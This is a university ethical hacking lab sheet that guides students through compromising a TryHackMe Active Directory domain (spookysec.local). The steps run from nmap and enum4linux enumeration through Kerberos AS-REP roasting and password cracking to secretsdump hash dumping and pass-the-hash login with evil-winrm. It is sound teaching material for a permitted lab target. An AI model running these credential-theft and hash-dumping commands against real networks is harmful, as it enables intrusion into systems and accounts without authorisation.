ETHICAL HACKING - M30239

WEEK 7 - WINDOWS EXPLOITATION AND PASSWORD ATTACKS

28/03/2022 - 01/04/2022

OUTLINE

ETHICAL HACKING - M30239 1

WEEK 6 - VULNERABILITY ASSESSMENT AND SCANNING 1

PART 0 2
Introduction 2
Prerequisite 2
Lab Environment 2
TASK 0 - Using the AttackBox 2

PART A - Windows Active Directory (AD) Exploitation 3

Task 1 - Discovery 3
Task 2 - Further Information Gathering or Enumeration 4
Task 3 - Kerberos 8
Task 4 - Dictionary attack. 9
Task 5 - Gaining Access 10
Task 6 - Privilege Escalation 11
PART 0

Introduction
Windows Active Directory (AD) is a service provided by Microsoft for managing domains, trees, and
forests. It is basically a hierarchical structure that stores information about objects on the network. Objects
could be users, computers, peripheral devices, file shares, and security groups. The server running the
Active Directory Service (AD DS) role is called the domain controller (DC). It is responsible for
centralised management and security management.

- Read more on Windows AD. We strongly recommend this room

https://tryhackme.com/room/activedirectorybasics

Prerequisite
- Complete previous weeks

Lab Environment
Throughout this unit, we will be utilizing the resources on TryHackMe including the Kali Linux Attakbox.
This allows us to use readily available Kali Linux and Ubuntu operating systems from anywhere.

YOU SHOULD ONLY ACCESS /EXPLOIT NON-PUBLIC RESOURCES WHERE YOU HAVE BEEN
GIVEN EXPRESS PERMISSION

TASK 0 - Using the AttackBox

1. Ensure that you are logged in with your student email i.e. up12345@myport.ac.uk.
2. Go to tryhackme.com/jr/2022uopwk7. Return to this document and follow the steps provided.
PART A - Windows Active Directory (AD) Exploitation

Before exploiting a physical AD environment, you would need to be within that environment. This could
be through being allowed access into the network legitimately or externally exploiting an object within the
AD environment. This could be through usual exploitation techniques or compromising misconfigurations
that exposes the DC or a device within the network to be public.

After pre-engagement, the next step in pentesting an AD network would be to compromise a device
through the pentesting methodology (recon to reporting). After that, you can then enumerate the AD
network by scanning the network through the legitimate or compromised device.

In this lab, we will pretend that we have been given legitimate access within a corporate network.

Task 1 - Discovery
Now that we are within the network, we can go ahead to scan the domain controller. We will use nmap to
scan all possible IP addresses and check for services. Run the quick scan first and the longer scan after.

##Quick scan
nmap -A IP-ADDRESS

##Long Scan
In another terminal, do an aggressive scan for all possible ports.

nmap -A -p- IP-ADDRESS -Pn

While the long scan is running, we can look at the result of our quick scan
We can see that several services are running including HTTP and SMB. We can also easily identify that
this is the Domain Controller (DC) as it is running AD services like LDAP. We can also identify this from
the SSL certificate commonName. We can also identify the domain name of DC spookysec.local.

Although penetration testing is a patient and persistent process, we would need to utilize our time quickly
by prioritizing the most vulnerable places first.
Since we are well familiar with HTTP and SMB enumeration, we will start there.

Task 2 - Further Information Gathering or Enumeration

Easy HTTP enumeration

The fastest thing we can do to a service that is running HTTP is to visit the IP address within a web
browser. http://IP-ADDRESS
This does not tell us much since we already know the version of the server from the NMAP scan.
However, it confirms our suspicions.

SMB enumeration
Before enumerating SMB, let us add the domain ‘spooky.sec’ to our local host list so that we can use
the domain name instead of the IP.

echo IP-ADDRESS spookysec.local >> /etc/hosts

We manually attempt to enumerate the SMB service but we can also use an automated scanner
(enum4linux) that is capable of finding more information.

enum4linux -a spookysec.local | less

The results from enum4linux can be overwhelming, so we are going to use the pipe option to send the
output to the less command.
At a first glance of our results, we are able to identify the known usernames on the DC as well as services
running including a File server Service (SMB).

To see the next page, press the spacebar

We also identify further information like the domain name and SID. Visit the Micrtosoft SID
documentation. What does S-1-5-21 mean?

By using the spacebar, slowly observe and analyse the results of your scan. You should identify all users
information such as Guest accounts, SIDs
You might find several unknown users on the device. For now, ignore the unknown users. Slowly look
through the list to avoid missing other users e,g, krbtgt

When you are done, press Q to exit.

Research: On your favourite web search engine, search for ”krbtgt”

We are able to identify that our DC is running the Kerberos service.

Task 3 - Kerberos

Kerberos is a network mutual-authentication protocol that allows users or services to communicate or

access services in a secure manner. It works by issuing tickets that allow users or services to prove their
identity.

To learn more about Kerberos and attacks on the protocol, we strongly recommend this room on THM.
Complete after this task.

Since Kerberos works by using supplied usernames and passwords credentials, we can attempt to
enumerate possible usernames by doing a wordlist (dictionary) attack using a fantastic tool called
Kerbrute.

##For Kali Linux

kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100

###For Attackbox/Kali

kerbrute -domain spookysec.local -users userlist.txt

#sudo pip3 install kerbrute

## Investigate how to find a username based word list within kali linux.
Some useful wordlists:

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

## If you are using a different OS, see installation instructions here

https://pypi.org/project/kerbrute/

## pip3 install kerbrute # install through Python

We get about ‘16’ possible valid usernames.

Retrieving Kerberos ticket
Next we will use Impacket to retrieve a Kerberos ticket and further decrypt it. If you are using the
attackbox, it is already installed.

python3 /usr/local/bin/GetNPUsers.py spookysec.local/svc-admin -no-pass

If you are using Kali Linux, do this

wget https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py

You should have a ticket after this line

Copy the hash and save it in a file. I would call mine hashfile

Task 4 - Dictionary attack.

Next, we would use John the Ripper to attempt to decrypt the hash

john hashfile --wordlist=/usr/share/wordlists/rockyou.txt

## Find a password list

We should have now retrieved the password for SVC-admin.

Task 5 - Gaining Access

SMB PATHWAY
Since we know that SMB protocol is running, we can attempt to use our compromised credentials to login
via SMB.

Installing SMBMAP
git clone https://github.com/ShawnDEvans/smbmap && cd smbmap
python3 -m pip install -r requirements.txt

Using smbmap to view the shares

python3 -m smbmap -H spookysec.local -d spookysec.local -u svc-admin -p PASSWORD

Alternatively, you have used smbclient in the recent past, do you remember the syntax of the command?

##smbclient -L ….

Pick a share and use smbclient to login to a share e.g. backup

smbclient \\\\spookysec.local\\backup --user svc-admin

Alternative

We can attempt to use our previous knowledge of Metasploit from last week to login to the server.

Start msfconsole by running the following command

msfconsole

Search for smb modules

search smb ## Which of the modules that can you use?

Task 6 - Privilege Escalation

Revert to previous labs and attempt to perform privilege escalation using a similar technique

TIP: impacket. Use Metasploit or directly

TIP: Dump all the hashes

On Metasploit: Full documentation on using secretsdump

msfconsole
use auxiliary/scanner/smb/impacket/secretsdump
options ## set all your options
exploit
Secretsdump directly on Attackbox

/opt/impacket/examples/secretsdump.py

secretsdump.py -just-dc username@spookysec.local

Secretsdump on Kali Linux

wget https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

secretsdump.py -just-dc username@spookysec.local

PSEXEC

NOTE:
Please note that the Windows OS used to rely on LM hashing to store passwords
(https://en.wikipedia.org/wiki/LAN_Manager#LM_hash_details) but has since moved over to using
NTLM (https://en.wikipedia.org/wiki/NT_LAN_Manager).

For the output of Jon:1000:aad3b435b51404eeaad3b435b51404ee:733db9d83b56cfce2ed7d2865f02bda6:::

This can be broken down into the following:

user: Jon
RID: 1000
LM hash: aad3b435b51404eeaad3b435b51404ee
NT hash: 733db9d83b56cfce2ed7d2865f02bda6

Some tools for password cracking

1. John
2. Hashcat
3. Online resources
Investigate how to use these resources. Use the man command

Task 7 - Pass the hash

Use the hash retrieved from the Kerberos ticket.

evil-winrm -i spookysec.local -H add-the-retrieved-hash-here --user administrator